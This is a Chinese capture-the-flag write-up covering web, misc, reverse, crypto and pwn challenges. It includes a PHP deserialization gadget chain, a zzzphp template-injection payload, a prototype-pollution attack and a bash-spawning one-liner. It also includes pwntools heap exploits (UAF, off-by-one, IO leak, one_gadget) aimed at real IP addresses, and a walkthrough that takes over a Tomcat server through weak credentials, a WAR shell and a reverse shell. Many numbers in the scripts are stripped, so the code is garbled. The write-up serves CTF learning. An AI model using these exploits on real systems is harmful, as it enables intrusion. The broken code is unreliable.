本文首发于“合天智汇”公众号 作者:Fortheone
WEB
Babyunserialize
扫目录发现了 www.zip
下载下来发现似曾相识
之前wmctf2020的webweb出了f3的反序列化题
直接用exp打
System被ban了 打phpinfo看看
<?php
namespace DB{
abstract class Cursor implements \IteratorAggregate {}
} namespace DB\SQL{
class Mapper extends \DB\Cursor{
protected
$props=["quotekey"=>"call_user_func"],
$adhoc=["phpinfo"=>["expr"=>""]],
$db;
function offsetExists($offset){}
function offsetGet($offset){}
function offsetSet($offset, $value){}
function offsetUnset($offset){}
function getIterator(){}
function __construct($val){
$this->db = $val;
}
}
}
namespace CLI{
class Agent {
protected
$server="";
public $events;
public function __construct(){
$this->events=["disconnect"=>array(new \DB\SQL\Mapper(new \DB\SQL\Mapper("")),"find")];
$this->server=&$this; }
};
class WS{}
}
namespace {
echo urlencode(serialize(array(new \CLI\WS(),new \CLI\Agent())));
}
发现被ban了很多函数
试了几个函数都没成功,然后翻phpinfo的时候翻到了一个flag
在环境变量里面。
flag值:flag{b26444a0-b80f-4bb8-a49a-952b5e7382b8}
Easyphp
首先尝试了各种执行命令的方法无果,返回看题目 是要fork出来的进程异常退出。
查了一下这个函数,发现要pid变为1的时候就会执行phpinfo。
这里看到父进程要退出,子进程变成孤儿进程时pid会变为1,也就是要子进程暂停住,使用 pcntl_wait 就可以挂起子进程,让pid变成1.
Payload: ?a=call_user_func&b=pcntl_wait
环境变量中有flag
flag值 flag{4c9c8d9d-1741-4967-ba54-9e200d0c3cd5}
Littlegame
打开题目下载源码可以直接看到获取flag的条件是
Admin[key] === password
看一下Admin里的内容
Admin里的三个password都不知道是什么。但是想到原型链污染,可以给Admin加上一个属性并赋值。
在这个路由下面有一个赋值的操作。setFn
查一下set-value是否有原型链污染的漏洞
根据poc来构造
设置一个test属性 值为123
再给key和password赋值即可获取flag。
flag值 :flag{02599a00-3e98-40a7-a0c8-e806086c45f0}
Rceme
看到命令执行的地方发现是zzzphp1.6.1的漏洞,但是题目改了过滤的函数
构造payload
{if:1)(hex2bin(dechex(112)).hex2bin(dechex(104)).hex2bin(dechex(112)).hex2bin(dechex(105)).hex2bin(dechex(110)).hex2bin(dechex(102)).hex2bin(dechex(111)))();die();//}{end%20if}
Flag还是在phpinfo里面。
flag值 :flag{438e2428-1314-43bd-b212-e3cfcda3584d}
Easytrick
可以用 INF 来绕过 原理如下
<?php
class trick{
public $trick1;
public $trick2; public function __construct(){
$this->trick1=INF;
$this->trick2=INF;
}
}
echo urlencode(serialize(new trick()));
flag值: flag{28a9fcfd-b322-40a8-a532-72c1062e0716}
MISC
签到
flag值 : flag{同舟共济扬帆起,乘风破浪万里航。}
the_best_ctf_game
Hxd打开,发现右边flag字符串,照着这个一个一个打出来
flag为:flag{65e02f26-0d6e-463f-bc63-2df733e47fbe}
电脑被黑
file看了下,是ext3文件,用ext3grep还原
直接 ext3grep --restore-all disk_dump 回复全部文件
看到一个flag.txt打开发现加密了,然后demo又是个elf程序,直接ida看下
找到了加密函数,对着加密函数写解密脚本,脚本如下
运行获得flag
flag为:flag{e5d7c4ed-b8f6-4417-8317-b809fc26c047}
file=open('flag.txt','rb')
f=file.read()
v4=
v5=
flag=""
for i in f:
flag=flag+chr((ord(i)^v4)-v5)
v4=(v4+)&0xff
v5=(v5+)&0xf
#print flag,v4,v5
print flag
WamaCry1
题目说是勒索病毒,然后给了个exe和加密后的flag,由于是勒索病毒,一般会用到rsa加密,而题目也说了公私钥,所以猜测exe获取到公私钥然后对flag进行rsa加密,就用ida看了下exe,大致是把ui布局好,然后里面调用了第一个son.exe,没有看到什么加密过程,那加密应该放在了son.exe里了,然后找了半天这个son.exe,就是找不到在哪,直到exeinfo看了下.....
Enigma Virtual Box 是一个打包QT程序的软件,也就是说这个是打包后的exe,我们找到工具解包就行了,百度了一下,找到一个EnigmaVBUnpacker的解包软件,解包后终于找到了son.exe
ida打开son.exe,直接字符串就看到一个ip,然后跟进分析了一下
加密函数,看来猜的没错就是rsa加密,然后又看了下函数表,没发现其它加密,那么只要找到私钥就能解密了
大致是链接远端服务器的12345端口,看题目说明是下载公私钥,然后我就想能不能访问这个地址去下,发现无法访问12345端口,然后nmap扫了下
发现开了8080,就访问了下
是个tomcat后台弱口令 tomcat tomcat 就进来了
常规操作上传war包拿shell 然后反弹shell
服务器的tmp目录下有个key目录,里面有两个文件
把服务器上/tmp/key下的文件都dump下来,server是个elf文件,我就ida分析了下
大致就是,监听本地12345端口看有socket连接没,有就跟此连接交互,根据题目,木马程序会把宿主的计算机信息传上远端服务器,然后远端服务器根据传来的信息在/tmp/key/目录下创建以计算机名为名的文件,然后再接受宿主机传来的私钥(看了下原先在服务器上的文件,发现是一个rsa私钥),然后第一个字符异或1(被坑了,没仔细看是buf,以为是整个传过来的字符串,BEGIN RSA PRIVATE KEY不需要异或)保存到创建的文件里(服务器上私钥的来源)
做到这就可以写解密脚本了
私钥还原脚本(不加BEGIN RSA PRIVATE KEY头,还原完再手动加上)
fin=open("xorkey","rb") #服务器上的私钥去除BEGIN RSA PRIVATE KEY头
fout=open("prive_key1","wb")
y=fin.read().split("\n\x00")
print y
for i in y[:-]:
b=ord(i[])^0x1
fout.write(chr(b)+i[:])
fout.write("\x0D\x0A")
解密脚本
from Crypto.PublicKey import RSA
import string
#prive.pem为前面异或后生成的文件加上BEGIN RSA PRIVATE KEY头后生成的文件
with open("prive.pem") as f:
key = f.read()
rsakey = RSA.importKey(key)
#flag.5就是题目给的flag.
with open('flag.5','rb') as f:
cipher = f.read().encode('hex')
cipher = string.atoi(cipher,base=)
print cipher
m=pow(cipher,rsakey.d,rsakey.n)
print hex(m)
m1="666c61677b32376263333539392d656339662d346263302d623030372d6266626366633664396661627d"
print m1.decode('hex')
一开始解出来decode( ‘ hex ’ )不了,以为还有其他加密,然后就在输出的16进制里看到了666c6167这明显flag的字符串,就把后面的单独decode( ‘ hex ’ )了
flag为:flag{27bc3599-ec9f-4bc0-b007-bfbcfc6d9fab}
RE
Z3
ida打开,题目要求我们输入flag,然后把我们的flag进行一些操做再与Dst比较,反过来求flag就是解多元一次方程组,直接用sympy解
先用脚本把比较值dump下来
import idc
import idautils
def tiqu(start,end):
a=[]
for i in range(start,end,):
a.append(idc.Word(i))
print a
tiqu(0x404020,0x4040c8)
然后编写解密脚本,最终脚本如下
import sympy
c1=[]
for i in range(,):
a1='v'+str(i)
exec(a1+'='+"sympy.Symbol(\'"+a1+"\')")
exec("c1.append("+a1+")")
a5=[20247L, 40182L, 36315L, 36518L, 26921L, 39185L, 16546L, 12094L, 25270L, 19330L, 18540L, 16386L, 21207L, 11759L, 10460L, 25613L, 21135L, 24891L, 18305L, 27415L, 12855L, 10899L, 24927L, 20670L, 22926L, 18006L, 23345L, 12602L, 12304L, 26622L, 19807L, 22747L, 14233L, 24736L, 10064L, 14169L, 35155L, 28962L, 33273L, 21796L, 35185L, 14877L]
v4 = * v49 + * v46 + * v47 + * v48 + * v50 + * v51 + v52
v5 = * v50 + * v49 + * v48 + * v46 + * v47 + * v51 + * v52
v6 = * v48 + * v46 + * v47 + * v49 + * v50 + * v51 + * v52
v7 = * v47 + * v46 + * v48 + * v49 + * v50 + * v51 + * v52
v8 = * v50 + * v48 + * v46 + * v47 + * v49 + * v51 + * v52
v9 = * v51 + * v50 + * v48 + * v47 + * v46 + * v49 + * v52
v10 = * v51 + * v49 + * v47 + * v46 + * v48 + * v52
v11 = * v56 + * v53 + * v54 + * v55 + * v57 + * v58 + v59
v12 = * v57 + * v56 + * v55 + * v53 + * v54 + * v58 + * v59
v13 = * v55 + * v53 + * v54 + * v56 + * v57 + * v58 + * v59
v14 = * v54 + * v53 + * v55 + * v56 + * v57 + * v58 + * v59
v15 = * v57 + * v55 + * v53 + * v54 + * v56 + * v58 + * v59
v16 = * v58 + * v57 + * v55 + * v54 + * v53 + * v56 + * v59
v17 = * v58 + * v56 + * v54 + * v53 + * v55 + * v59
v18 = * v63 + * v60 + * v61 + * v62 + * v64 + * v65 + v66
v19 = * v64 + * v63 + * v62 + * v60 + * v61 + * v65 + * v66
v20 = * v62 + * v60 + * v61 + * v63 + * v64 + * v65 + * v66
v21 = * v61 + * v60 + * v62 + * v63 + * v64 + * v65 + * v66
v22 = * v64 + * v62 + * v60 + * v61 + * v63 + * v65 + * v66
v23 = * v65 + * v64 + * v62 + * v61 + * v60 + * v63 + * v66
v24 = * v65 + * v63 + * v61 + * v60 + * v62 + * v66
v25 = * v70 + * v67 + * v68 + * v69 + * v71 + * v72 + v73
v26 = * v71 + * v70 + * v69 + * v67 + * v68 + * v72 + * v73
v27 = * v69 + * v67 + * v68 + * v70 + * v71 + * v72 + * v73
v28 = * v68 + * v67 + * v69 + * v70 + * v71 + * v72 + * v73
v29 = * v71 + * v69 + * v67 + * v68 + * v70 + * v72 + * v73
v30 = * v72 + * v71 + * v69 + * v68 + * v67 + * v70 + * v73
v31 = * v72 + * v70 + * v68 + * v67 + * v69 + * v73
v32 = * v77 + * v74 + * v75 + * v76 + * v78 + * v79 + v80
v33 = * v78 + * v77 + * v76 + * v74 + * v75 + * v79 + * v80
v34 = * v76 + * v74 + * v75 + * v77 + * v78 + * v79 + * v80
v35 = * v75 + * v74 + * v76 + * v77 + * v78 + * v79 + * v80
v36 = * v78 + * v76 + * v74 + * v75 + * v77 + * v79 + * v80
v37 = * v79 + * v78 + * v76 + * v75 + * v74 + * v77 + * v80
v38 = * v79 + * v77 + * v75 + * v74 + * v76 + * v80
v39 = * v84 + * v81 + * v82 + * v83 + * v85 + * v86 + v87
v40 = * v85 + * v84 + * v83 + * v81 + * v82 + * v86 + * v87
v41 = * v83 + * v81 + * v82 + * v84 + * v85 + * v86 + * v87
v42 = * v82 + * v81 + * v83 + * v84 + * v85 + * v86 + * v87
v43 = * v85 + * v83 + * v81 + * v82 + * v84 + * v86 + * v87
v44 = * v86 + * v85 + * v83 + * v82 + * v81 + * v84 + * v87
v45 = * v86 + * v84 + * v82 + * v81 + * v83 + * v87
b2=[] for i in range(,):
exec("b2.append("+'v'+str(i)+')')
for j in range(,len(a5)):
b2[j]=b2[j]-a5[j]
#print c1,b2
f=sympy.solve(b2,c1)
flag=""
for i in range(,):
a1='v'+str(i)
exec("flag+=chr(f["+a1+"])")
print flag
运行获得flag
flag为flag{7e171d43-63b9-4e18-990e-6e14c2afe648}
hyperthreading
先看字符串来定位主函数,进到主函数后发现创建了3个线程,点进去发现函数加了花指令,先把一些花指令去除后,发现了加密函数
加密函数如下,byte_40336c是我们输入的,大致意思是(byte_40336c[i]<<6) ^(byte_40336c[i]>>2)^0x23+0x23
加密后与byte_402150比较
反向解密有点麻烦就直接爆破了,解密脚本如下
a1=[, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ]
f=""
for i in range(,):
for j in range(0x20,0x7f):
b=(((((j<<)^(j>>))&0xff)^0x23)+0x23)&0xff
if b == a1[i]:
f=f+chr(j)
break
print f
flag为:flag{a959951b-76ca-4784-add7-93583251ca92}
CRYPTO
bd
看了下代码,发现e很大,想到Wiener_attack,然后去github上下了个攻击脚本,直接脚本跑出d,然后解密
d=
n=
c=
m=pow(c,d,n)
print hex(m)[:-].decode('hex')
flag为:flag{d3752538-90d0-c373-cfef-9247d3e16848}
lfsr
参考这篇文章: https://xz.aliyun.com/t/3682
# This file was *autogenerated* from the file .sage
from sage.all_cmdline import * # import sage library _sage_const_100 = Integer(); _sage_const_2 = Integer(); _sage_const_1 = Integer()
s = '' N = _sage_const_100
F = GF(_sage_const_2 )
ans=[]
out = s
Sn = [vector(F,N) for j in range(N+_sage_const_1 )]
for j in range(N+_sage_const_1 ):
Sn[j] = list(map(int,out[j:j+N])) X = matrix(F,Sn[:N])
invX = (X**-_sage_const_1 )
Y = vector(F,Sn[-_sage_const_1 ])
Cn = Y * invX
res = ''.join(str(i) for i in Cn)
ans.append(int(res[::-_sage_const_1 ],_sage_const_2 ))
print (ans)
flag值:flag{856137228707110492246853478448}
PWN
babyjsc
直接nc 用python2执行
__import__('os').execl('/bin/bash','-p')
flag值 flag{c4e39be1-666e-43c4-bf9c-3b44bd280275}
maj
这道题混肴事情是挺失败的,看下相关的,然后发现在整个过程都是不会影响原来的参数,所以这样混肴就是直接插进去, 不管就完事,还以为是原题,后来审了下发现是uaf+io泄露,没了
#coding:utf-
from pwn import *
#context.log_level = 'debug'
context.arch = 'amd64'
#p = remote("121.36.209.145",)
#p = process('./pwn_e')
p = remote("101.200.53.148", )
elf = ELF('./pwn_e')
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sda = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
sa = lambda a,s:p.sendafter(a,s)
def new(size,content):
sla("5. exit\n>> ",'')
sla("please answer the question\n\n",str())
sla("?\n",str(size))
sda("start_the_game,yes_or_no?\n",content)
def dele(idx):
sla(">> ",'')
sla("index ?\n",str(idx))
def show(idx):
sla(">> ",'')
sla("index ?\n",str(idx))
def edit(idx,data):
sla(">> ",'')
sla("\n",str(idx))
sda("?\n",data)
one = [0x45226,0x4527a,0xf03642,0xf1207]
new(0x100,'a'*0x100)#
new(0x68,'a'*0x100)#
new(0x10,'a'*0x100)#
dele()
new(0x68,'a')#
new(0x68,'a')#
new(0x28,'a')#
dele()
edit(,'\x00'*0x68+p64(0x111))
dele()
new(0x98,'a')#
edit(,p16(0x25dd))
new(0x68,'a')#
new(0x68,'\x00'*0x33+p64(0xfbad3c80)+p64()*+chr())#
edit(,'\x00'*0x33+p64(0xfbad3c80)+p64()*+chr())
rc(0x58)
libc = u64(rc().ljust(,'\x00'))- 0x3c56a3
log.info("libc: "+hex(libc))
ru(">> ")
sl(str())
ru("\n")
sl(str())
edit(,p64(libc+0x3c4b10-0x23))
sla(">> ",'')
sla("\n",str())
sla("______?",str(0x68))
sda("start_the_game,yes_or_no?",'a')
sla(">> ",'')
sla("\n",str())
sla("______?",str(0x68))
sda("start_the_game,yes_or_no?",'a')
#new(0x68,'a')#
edit(,'\x00'*0x13+p64(libc+0xf1207))
sla(">> ",'')
sla("\n",str())
sla("______?",str(0x68))
p.interactive()
[+] Opening connection to 101.200.53.148 on port 15423: Done [*] '/home/yezi/Yezi/CTF/gaoxiao_yi/pwn/lgd/attachment/pwn_e'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] libc: 0x7fbc202bd000
[*] Switching to interactive mode
Congratulations,please input your token: $ icqda4593f7181003c0eea4007d93026
flag{8e63eba52ba4257efc6fe517cf2cc83a}[*] Got EOF while reading in interactive
$
flag值:flag{8e63eba52ba4257efc6fe517cf2cc83a}
easybox
我就没看看出 unsafe的box在哪里,,就看道了off by one,没用edit,没又edit
,但是直接打就完事,跟maj差不多
#!/usr/bin/env python
# -*- coding: utf- -*-
from pwn import *
import sys
context.log_level = 'debug'
s = lambda x :orda.send(str(x))
sa = lambda x, y :orda.sendafter(str(x),str(y))
sl = lambda x :orda.sendline(str(x))
sla = lambda x, y :orda.sendlineafter(str(x), str(y))
r = lambda numb= :orda.recv(numb)
rc = lambda :orda.recvall()
ru = lambda x, drop=True :orda.recvuntil(x, drop)
rr = lambda x :orda.recvrepeat(x)
irt = lambda :orda.interactive()
uu32 = lambda x :u32(x.ljust(, '\x00'))
uu64 = lambda x :u64(x.ljust(, '\x00'))
db = lambda :raw_input()
def getbase_b64(t):
pid=proc.pidof(s)[]
pie_pwd ='/proc/'+str(pid)+'/maps'
f_pie=open(pie_pwd)
return f_pie.read()[:]
if len(sys.argv) > :
s = "101.200.53.148:34521"
host = s.split(":")[]
port = int(s.split(":")[])
orda = remote(host,port)
else:
orda = process("./pwn")
def add(idx,size,content):
sla(">>>\n",)
sla("\n",idx)
sla("\n",size)
sa("\n",content)
def dele(idx):
sla(">>>\n",)
sla("\n",idx)
def add_e(idx,size,content):
sla("\n",)
sla("\n",idx)
sla("\n",size)
sa("\n",content)
add(,0x18,'a')
add(,0x68,'a')
add(,0x68,'a')#
add(,0x68,'a')
add(,0x68,'a')
dele()
dele()
add(,0x18,'a'*0x18+'\xe1')
dele()
add(,0x28,'a')
add(,0x38,'a')#
add(,0x28,'a')
add(,0x30,'a')
dele()
add(,0x18,'a'*0x18+'\xe1')
dele()
add(,0x38,'a')
add(,0x58,'\x00'*0x28+p64(0x71)+p16(0x25dd))
add(,0x38,'\x00'*0x28+p64(0x80))
add(,0x68,'a')
add(,0x68,'\x00'*0x33+p64(0xfbad3c80)+p64()*+chr())
r(0x58)
libc = u64(r().ljust(,'\x00'))- 0x3c56a3
log.info("libc: "+hex(libc))
sla("\n",)
sla("\n",)
sla("\n",0x18)
sa("\n",'a')
#add(,0x18,'a')
add_e(,0x68,'a')
add(,0x68,'a')#
add(,0x68,'a')
add(,0x68,'a')
dele()
dele()
add(,0x18,'a'*0x18+'\xe1')
dele()
add(,0x98,'\x00'*0x68+p64(0x71)+p64(libc+0x3c4b10-0x23))
add(,0x38,'a')
add(,0x68,'a')
add(,0x68,'\x00'*0x13+p64(libc+0xf1207))
#ru("\n")
#sla(">>\n",'')
#sla("\n",)
#sla("\n",0x60)
irt()
flag值 :flag{cab1b22dc48805990b26e882d78e9134}
想getCTF技能请戳:https://sourl.cn/r6Ckj9